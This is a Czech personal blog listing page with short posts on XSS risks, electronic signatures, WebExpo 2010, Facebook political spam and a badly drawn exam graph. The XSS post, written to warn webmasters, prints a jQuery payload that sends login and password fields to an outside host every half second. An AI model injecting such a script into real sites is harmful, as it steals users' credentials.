S XSS zranitelností se dá napáchat více škody, než si myslíte
Otázka pro webmastery: Víte, co dělá následující jQuery kód?
<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>
Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.
Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.
Elektronický podpis - vyplatí se vůbec?
Elektronický podpis se v poslední době velmi rozšířil a může vám ušetřit spoustu času s vyřizováním na úřadech. Je to tak nebo se jej nevyplatí pořizovat?
Za elektronický podpis se v širším významu dá považovat jakékoliv uvedení identifikačních údajů autora do elektronického dokumentu. Takovýto podpis samozřejmě není schopen zaručit ani integritu ani autenticitu podepsaného. Avšak velmi často se tímto pojmem myslí zaručený elektronický podpis. Takovýto podpis zajišťuje pomocí kryptografických metod a dohledu nezávislé třetí strany (certifikační autority) integritu a autenticitu dat. Tím je zajištěno, že odesílatelem zprávy je skutečně ten, kdo předpokládáme a také to, že zpráva nebyla během přenosu změněna.
Jaké bylo WebExpo 2010 (krátké postřehy)
Kdybych článek nenapsal teď, tak už nikdy (důkazem budiž rozepsaný, dosud nezveřejněný článek o ročníku 2009). Takže... WebExpo 2010 jsem si užil. Objevilo se sice pár failů, ale byla zde hlavně pozitiva – skvělí lidé, hordy postřehů, nápadů, motivací a zajímavých myšlenek.
K přednáškám bych skoro neměl výhrady. Mile mě překvapil páteční dopolední Business blok následovaný „kreativními“ přednáškami v Designu. Zde mě jen trochu mrzelo, že si Lukáš Veverka a Petr Skala skákali do řeči, zjevně nejsou moc zvyklí prezentovat, ale jejich práce je úchvatná.
Po první přednášce jsem si zašel pro kávu, načež jsem si všiml nějaké dlouhé fronty. Začínala ve dveřích označených jako „registrace“, končila... někde v dálce. Ale jako fakt v dálce.
Falešný profil na Facebooku využívaný k politické propagaci Nové Generace
Facebook je ráj pro podvodníky a spamery, kteří se chtějí přiživit na naivitě a důvěřivosti lidí. Vznikají stále nové techniky, jak oslovit co největší masu uživatelů reklamou - počínaje neexistujícími soutěžemi o hodnotné ceny, konče zneužíváním jeho funkcí.
Jeden případ využití Facebooku k politické propagandě se objevil nyní ve Znojmě (je cílen na znojemské uživatele). Masivně spamuje ostatní uživatele Facebooku zajímavým trikem.
Státní maturita z matematiky nakreslená v Malování?
Ze zvědavosti jsem nahlédl do oficiálních testů nanečisto nových maturit z matematiky.
Já, kdybych byl takto narýsovaná parabola, asi bych si uvázal smyčku a na ose x bych se oběsil. Nevím, kdo to na ministerstvu školství schvaloval, ale mě by za takový graf vyrazili i ze semestrální písemky...
Prosím, řekněte těm na ministerstvu, že v Malování je vlevo ikonka, kterou se dají dělat kolečka, nemusí to bastlit tužkou! A křivka tam udělat taky jde. Ať to má aspoň trochu úroveň, né? :-)
(Přímý odkaz na zdrojové PDF, kdyby mi někdo nevěřil)
Stránka: < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 >
Kategorie blogu
Twitter feed
- Michal Smrčka:
@ScottyCZE Největší prdel je, že dostala od vedoucího a oponenta návrh na známky C a E.
5.2.2012 13:50 - Michal Smrčka:
Vodafone podmínil dotaci na tel. datovým tarifem, ale všimli jste si, že současně ZDRAŽIL? Např. iPhone z 12877 na 13377 při 477/měs.
3.2.2012 19:28 - Michal Smrčka:
"Zdar vole, kolik berete piv?" - "Haló? Voláte správně?" #kurva #android
2.2.2012 12:40
@michalsmrcka